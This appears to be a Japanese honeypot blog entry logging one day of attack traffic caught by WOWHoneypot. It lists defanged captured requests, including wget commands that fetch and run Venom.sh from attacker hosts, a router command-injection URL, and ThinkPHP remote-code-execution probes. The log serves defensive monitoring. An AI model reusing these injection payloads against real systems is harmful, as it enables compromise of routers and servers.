23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(281日目)

2019/12/22(日)

トータルは80件でした。

ハンティングログは以下です。

156.222.242[.]20 wget hxxp[:]//185.132.53[.]119/Venom.sh
156.202.255[.]47 wget hxxp[:]//185.132.53[.]119/Venom.sh

www.virustotal.com
www.virustotal.com

45.189.74[.]190 wget${IFS}-qO-${IFS}hxxp[:]//104.244.75[.]222/b

www.virustotal.com
www.virustotal.com

件数 概要 リクエス
40 アクセス GET /
11 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
2 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
2 ルータの脆弱性を狙った通信 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp[:]//185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$
2 phpMyAdminの調査 GET /admin-scripts.asp
2 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
2 管理者情報の調査 GET //admin/config.php?password%5B0%5D=bebydviyx&username=admin
2 不正中継の試み CONNECT www.baidu.com:443
1 DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 POST /editBlackAndWhiteList
1 サイト構成の調査 GET /sitemap.xml
1 クローリング GET /robots.txt
1 phpMyAdminの調査 GET /phpmyadmin//index.php
1 不明 GET /?0628182016134805143312
1 SSL証明書発行時の一時ファイルの調査 GET /.well-known/security.txt
1 不正中継の調査 HEAD hxxp[:]//123.125.114.144/
1 不正中継の調査 GET hxxp[:]//www.123cha.com/
1 phpMyAdminの調査 GET /phpmyadmin
1 Silverlightドメイン間ポリシーファイルの調査 GET /clientaccesspolicy.xml
1 gitの調査 GET /.git/HEAD
1 不正中継の試み CONNECT www.ipip.net:443
1 不正中継の試み CONNECT cn.bing.com:443